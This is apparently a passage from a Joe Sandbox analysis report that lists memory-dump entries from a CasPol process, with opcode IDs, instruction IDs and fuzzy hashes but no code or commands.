                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b52132047e7bb31160e7e175562c2e800094f41c452b82de9af3e0c7350787b8
                                    • Instruction ID: d2a02c83c50f9a3795f9016cc9d49eae05cf8628be6ab4f83072c4c6bac71c4f
                                    • Opcode Fuzzy Hash: b52132047e7bb31160e7e175562c2e800094f41c452b82de9af3e0c7350787b8
                                    • Instruction Fuzzy Hash: 62F19B79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63bc39e4118b3f025b41a1cd5990823ed3a5751971de87f34279027b3f1e13eb
                                    • Instruction ID: 790013000b7af5e631167f33f07424f6938460058a748588546c185dc7fefcf7
                                    • Opcode Fuzzy Hash: 63bc39e4118b3f025b41a1cd5990823ed3a5751971de87f34279027b3f1e13eb
                                    • Instruction Fuzzy Hash: 1EF19B79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d55d55928af0558adf6e47ed780b595f5e90d7b111eec9779482c7a4abb3a1e0
                                    • Instruction ID: 62d9c6d9b261efa865bcf6350bb985ec8c7ab61483b2aa000542e9fa8ba96989
                                    • Opcode Fuzzy Hash: d55d55928af0558adf6e47ed780b595f5e90d7b111eec9779482c7a4abb3a1e0
                                    • Instruction Fuzzy Hash: FEA15B35E002199BDB15EBB9D45079EBBF6AF88344F20852CD505AB784EF38ED42CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05830f0463ed4527881c09d2c87b9bb87248a7b10f93e7ac76e1b0a5ed1fa38c
                                    • Instruction ID: 4eb0f66cb730ab759cdc27f6b6a8ebd72d08559fdd8c3722f951902570d8637f
                                    • Opcode Fuzzy Hash: 05830f0463ed4527881c09d2c87b9bb87248a7b10f93e7ac76e1b0a5ed1fa38c
                                    • Instruction Fuzzy Hash: 84F19C79A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c0834697a0c0ef71b52ee24edb04e2ed3333a080ef00b3ccc904d6e7d6d3a2ab
                                    • Instruction ID: c6c803c39a6165df64df32ce6a0a5b039dc23740786ac767149c7310beedf606
                                    • Opcode Fuzzy Hash: c0834697a0c0ef71b52ee24edb04e2ed3333a080ef00b3ccc904d6e7d6d3a2ab
                                    • Instruction Fuzzy Hash: D8B17B30B006109FCB44EBB8C998B5DBBB6AF88369F159628E515DB3E4EF34DC418B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e3e9e5a05876d36193715633d4bd17c3c8784fc01f3b3be771fd117d9615293
                                    • Instruction ID: 0e4a24d703b155b53ab07cbb0d0d33ac6337696fafcd16df6f24df138388f5d1
                                    • Opcode Fuzzy Hash: 8e3e9e5a05876d36193715633d4bd17c3c8784fc01f3b3be771fd117d9615293
                                    • Instruction Fuzzy Hash: 0CE19B79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 38648aaef3d001d23fe39f182640a4f6d3292f230cdc88cb9527ab38f7f299bf
                                    • Instruction ID: 15bf46943a12a71882d53ac0861b648368ce88e82d14ad1532b12543a0e751c4
                                    • Opcode Fuzzy Hash: 38648aaef3d001d23fe39f182640a4f6d3292f230cdc88cb9527ab38f7f299bf
                                    • Instruction Fuzzy Hash: 93E19A79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af81d56eb4453638aa6d35c7b0cccd34a5188b4a71364863991a301f64f0721c
                                    • Instruction ID: 4e500ace0f24fb0f9ef28a259ccc2aa0eae2f3b3261e27532294124142f938b0
                                    • Opcode Fuzzy Hash: af81d56eb4453638aa6d35c7b0cccd34a5188b4a71364863991a301f64f0721c
                                    • Instruction Fuzzy Hash: 1B919270E403468FCB15EFB8E49069DBFB1EF49310F10C56AD509EB295E63D9845CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4d2977567ef7bb35f5a9b78c39f0bdb6035bfeeefd9704e220f28f35659d78cc
                                    • Instruction ID: d8dc64eb4ba6b84434dc758ec794783fefb98e8ec4b339eddb66fb2b6126b302
                                    • Opcode Fuzzy Hash: 4d2977567ef7bb35f5a9b78c39f0bdb6035bfeeefd9704e220f28f35659d78cc
                                    • Instruction Fuzzy Hash: D5E19A79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a1aa9c83cdc400c789186fc78822812cedd36e7ff683d4d841619c0a9ec4f55
                                    • Instruction ID: c5ebae10db10808d334ed94e15251234e8a668b45458f4ff3e0520f82320ae49
                                    • Opcode Fuzzy Hash: 6a1aa9c83cdc400c789186fc78822812cedd36e7ff683d4d841619c0a9ec4f55
                                    • Instruction Fuzzy Hash: 3CD19B79A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 537615a805e510272b4c0976630c20c9422bc457feb1ee40f1fbb91ab2203c0e
                                    • Instruction ID: 7c388af4c9ab1a11836341688eef8e16f9eabe007103dea0dade7c7331f30493
                                    • Opcode Fuzzy Hash: 537615a805e510272b4c0976630c20c9422bc457feb1ee40f1fbb91ab2203c0e
                                    • Instruction Fuzzy Hash: D5916C70F002049FCB20DBE9D890A9DBBF2AF85319F15851AE509EB755DF74EC418BA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c494e08d12464693fcc37dedceca8deaae76b4744b7e866e6e2b72cc87c5395
                                    • Instruction ID: 4c403125344935e61ab35050c315fc71f440de1bfdc7f8938d9fca8c3c95f43b
                                    • Opcode Fuzzy Hash: 0c494e08d12464693fcc37dedceca8deaae76b4744b7e866e6e2b72cc87c5395
                                    • Instruction Fuzzy Hash: 9491F631E05259AFDB05CBF8C890BDEBFB1AF89304F15806AD105EB791DA349D05CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 21dc62ea918856b06b7fd2ff15ad9da97d47aebb724a28d78459d79859d18937
                                    • Instruction ID: 11d82392de6a8f0facadeadcdf527593a3b6ecd2aa38cd44503abaebf6457756
                                    • Opcode Fuzzy Hash: 21dc62ea918856b06b7fd2ff15ad9da97d47aebb724a28d78459d79859d18937
                                    • Instruction Fuzzy Hash: 11D1AA79A012299FCB61DF29D984A98BBF5FF48310F1081E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4f78a914ce497eb10da1bc15f6d23b2e75fcc2f80f1a75d8589fab93c36db97
                                    • Instruction ID: 0c8603ced30bf0ead690c1f3a0e0d841eaa65044f0e157e914e26ae9c3d5252e
                                    • Opcode Fuzzy Hash: c4f78a914ce497eb10da1bc15f6d23b2e75fcc2f80f1a75d8589fab93c36db97
                                    • Instruction Fuzzy Hash: BEC19A79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5fd90e79eddeaa7cf82e957d0072882fec213bec158b00d64caf92e4428b3563
                                    • Instruction ID: 900e467f03352815cfcbec3816fe25bb6a13ace5eb834865fbe3e9f4ff4dcefa
                                    • Opcode Fuzzy Hash: 5fd90e79eddeaa7cf82e957d0072882fec213bec158b00d64caf92e4428b3563
                                    • Instruction Fuzzy Hash: 45915B70F002049FCB20DBE9C894A9DBBF2AF85318F15851AE509EB769DB74EC41CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 52f4db624f0d1a0b2bbfe09339f62cf5e5fe4153b6a6f65cd47924285581fc29
                                    • Instruction ID: 7fd5a2293cd2417a62775048543888b2fce548f814c3cd7bf53d5b13b3a64c48
                                    • Opcode Fuzzy Hash: 52f4db624f0d1a0b2bbfe09339f62cf5e5fe4153b6a6f65cd47924285581fc29
                                    • Instruction Fuzzy Hash: BB819334A002189FDB04DFB9D494A9EFBF6AF88314F158569E405EB791DB38EC41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f809aa9b3878395c83c2e71d66c6157fd0048559b136e27a9ee3f1d36fc28c1
                                    • Instruction ID: 1a2ff178fff7f45215f93eb19ca514359733a311ad1bb2fc46dda4d170fd3ff9
                                    • Opcode Fuzzy Hash: 9f809aa9b3878395c83c2e71d66c6157fd0048559b136e27a9ee3f1d36fc28c1
                                    • Instruction Fuzzy Hash: 50C19979A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f95bd68b2cc0f2028c06fcb8163f0a18f562c5d5ad35670bd70cedd84657b215
                                    • Instruction ID: 629325e02c799e5839a7cd35f8a5357a874bcfeb66fa9294c5ccbad58a135367
                                    • Opcode Fuzzy Hash: f95bd68b2cc0f2028c06fcb8163f0a18f562c5d5ad35670bd70cedd84657b215
                                    • Instruction Fuzzy Hash: 00716A71F042818FD701EB28E85475ABFE6AF86300F1680BAD5099F796D67EAC06C355
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d1a03ebdad9ed54ef966f606cbcfd30a25ff300e7f07fb2996f15c72e21cfe6c
                                    • Instruction ID: a0fabd761e864f77304ec41dca10d5da9ea5a2de4dd0e185e268bdd7c8cfdf86
                                    • Opcode Fuzzy Hash: d1a03ebdad9ed54ef966f606cbcfd30a25ff300e7f07fb2996f15c72e21cfe6c
                                    • Instruction Fuzzy Hash: D9B19979A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b83cb391ea0dc6a1e6f6c05292f838daddde93f9f6443f995174109440a5a68
                                    • Instruction ID: ec4119a085123a53f77b153c390afaa17206b5ede3f0a5babeae675979de8af4
                                    • Opcode Fuzzy Hash: 2b83cb391ea0dc6a1e6f6c05292f838daddde93f9f6443f995174109440a5a68
                                    • Instruction Fuzzy Hash: 1EB19979A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17aed8d3705508f337286e6086fa68539f446915fae1c1edd74f1a20ef433626
                                    • Instruction ID: 29e7b5295dda48b61b334e516da0797126630517a0f06d00e4b3b4bc9f968c6d
                                    • Opcode Fuzzy Hash: 17aed8d3705508f337286e6086fa68539f446915fae1c1edd74f1a20ef433626
                                    • Instruction Fuzzy Hash: A0A18779A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 36ecf2d215a6a61a6319552747a333527b3ef0d386f7763d2ec7e19773189ce4
                                    • Instruction ID: 3fc0601ea3d34a371a6aa57c267303dfa9132eca5cc18e080543e4a33fa18539
                                    • Opcode Fuzzy Hash: 36ecf2d215a6a61a6319552747a333527b3ef0d386f7763d2ec7e19773189ce4
                                    • Instruction Fuzzy Hash: 77A19879A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d292c30bc024ab1ada0830f2834f6203fdc633b8888f93fa27f2cc4e6d64437c
                                    • Instruction ID: f6fb3285aa29b6904ca032c02b14c749a7d62cebcea553fe47d574e3b4ee62ad
                                    • Opcode Fuzzy Hash: d292c30bc024ab1ada0830f2834f6203fdc633b8888f93fa27f2cc4e6d64437c
                                    • Instruction Fuzzy Hash: 7761B630B082458FD706DBB8C855B9DBFF2AF8A304F1685A6D405EF392DA359C06CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf7567cae4ccd3e68d15304cae5dca9f6eb1993f25a552e4585e4085581eefae
                                    • Instruction ID: f81fd1544913b36a0aa113ee47aa9ee7915a2369ea3543a4cd8fef6926639599
                                    • Opcode Fuzzy Hash: cf7567cae4ccd3e68d15304cae5dca9f6eb1993f25a552e4585e4085581eefae
                                    • Instruction Fuzzy Hash: B1617D34B001148FCB14DBB9C498AADBBF6AF88319B2540B9E50AEB760EF359C45CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22095457e07db9265ad8027ebcb436a1722fce89b009417561a60f83d63e7dab
                                    • Instruction ID: c2295f40639fac7cbfa4201cd0687b515b33b8539622e94fa2d356cd19db0fba
                                    • Opcode Fuzzy Hash: 22095457e07db9265ad8027ebcb436a1722fce89b009417561a60f83d63e7dab
                                    • Instruction Fuzzy Hash: A251F434F05254AFCB05DBB8C8606AE7FF6AF89310B1580AAD509EB392DE349D05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 884341069f96efea8d74512c17175f1942d5fe3709c05c4c8a6860598bcdc626
                                    • Instruction ID: f87a8f2347bac8c7350d96ed61c9ab9ec14d18f94139cc29c5610acec4c47efb
                                    • Opcode Fuzzy Hash: 884341069f96efea8d74512c17175f1942d5fe3709c05c4c8a6860598bcdc626
                                    • Instruction Fuzzy Hash: E8918979A012299FCB62DF29D984A98BBF5FF48310F1181E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f2417bc2db775713dcfd77a6a7c8fc3d03ae234148b2fc771486d514dde790a
                                    • Instruction ID: affed1518d0642a26bc40efa4756de2ac7552d29c43801b2ad846583d01a34ac
                                    • Opcode Fuzzy Hash: 0f2417bc2db775713dcfd77a6a7c8fc3d03ae234148b2fc771486d514dde790a
                                    • Instruction Fuzzy Hash: AA51D330B002148FCF59EBB8C45425E7BF2AF89344B158469D40AEB792EF38DC42CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f519d6bf6a1049c6293b53809f46c51afb0e9ff7a60a6d82963581c72f27c3eb
                                    • Instruction ID: a925547de2290e8dfa5ed8f48b9957a1c8a7ade0a151eca25f0a76e2677ea7aa
                                    • Opcode Fuzzy Hash: f519d6bf6a1049c6293b53809f46c51afb0e9ff7a60a6d82963581c72f27c3eb
                                    • Instruction Fuzzy Hash: 88818879A012299FCB61DF29D988A98BBF5FF48310F1181E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd3c1fd0850a3e8fc936473dc8fd9aaccc35e8f468a82503a5a1a724bbebfe0f
                                    • Instruction ID: 13052e890f39f91ab1efd32fc0f78bf569cbbe6ac424c6f7b44451cf21c06d96
                                    • Opcode Fuzzy Hash: fd3c1fd0850a3e8fc936473dc8fd9aaccc35e8f468a82503a5a1a724bbebfe0f
                                    • Instruction Fuzzy Hash: 4A51DF31B083418FD701EB78A84875A7BF69F89740F1580B6D508DB382EB3DEC0587A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 264f8074d76148aec8ab992a6fd1ae676e459e1790dd949a1c305f293109dfa3
                                    • Instruction ID: 81198a28b724fc12e13a327d4d190dc51940ca425f8935303597fe4afa2192e6
                                    • Opcode Fuzzy Hash: 264f8074d76148aec8ab992a6fd1ae676e459e1790dd949a1c305f293109dfa3
                                    • Instruction Fuzzy Hash: C1818879A012299FCB61DF29D988A98BBF5FF48310F1181E9E80DA3755EB315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c8f7eb2b54d7b3c8bcb3eec3f06671bde9d89f9ece04b8efe744cf165f08e439
                                    • Instruction ID: 006ff4912e44089c36bbbb7a957aee020883f721a3dc05e4ce1163a5ab201022
                                    • Opcode Fuzzy Hash: c8f7eb2b54d7b3c8bcb3eec3f06671bde9d89f9ece04b8efe744cf165f08e439
                                    • Instruction Fuzzy Hash: 5051A234B002148FCB14EBB8D49869DBBF7AF88325B208529D50AEB754DF35ED42CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d1886774dd6748dd2456382fc63e3203e74ecf866c3f2fd5fd2ab7869466baee
                                    • Instruction ID: 2502794b4365e400eaf5e4af23ec8f5d420736d2bcf5fb7e1443f9c8ea1830d1
                                    • Opcode Fuzzy Hash: d1886774dd6748dd2456382fc63e3203e74ecf866c3f2fd5fd2ab7869466baee
                                    • Instruction Fuzzy Hash: 7D510435A00219CFDB54CFA8C494AAEBBF6BF88314B258529D406EB751DB35EC42CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f7b105ffe40e829f7af1431762d44ff9eb1e3027a67bc6d6bda8543bc2973254
                                    • Instruction ID: 782d40ccf782b659e3132a779b1e0be11539a3c3224a8aced6c1ad67dc5d7547
                                    • Opcode Fuzzy Hash: f7b105ffe40e829f7af1431762d44ff9eb1e3027a67bc6d6bda8543bc2973254
                                    • Instruction Fuzzy Hash: C4518F34B002458FDB55DFB8C490A6EBBF2AF85314F19846AD909DB741EB38ED42CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 691baba9cf6f4a66448f7df15aaf8c4ac2d877da5be1d05f9d707f2c99aba8a4
                                    • Instruction ID: f26a4e7bfc23ceb944344bf67ff38493bc7d37960a146cf3836332c145d68a58
                                    • Opcode Fuzzy Hash: 691baba9cf6f4a66448f7df15aaf8c4ac2d877da5be1d05f9d707f2c99aba8a4
                                    • Instruction Fuzzy Hash: 3C511730E082905BDB64C7BCC8D4B5EBBE39F85318F15851DD20B6BBC5DAB5AC1087A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
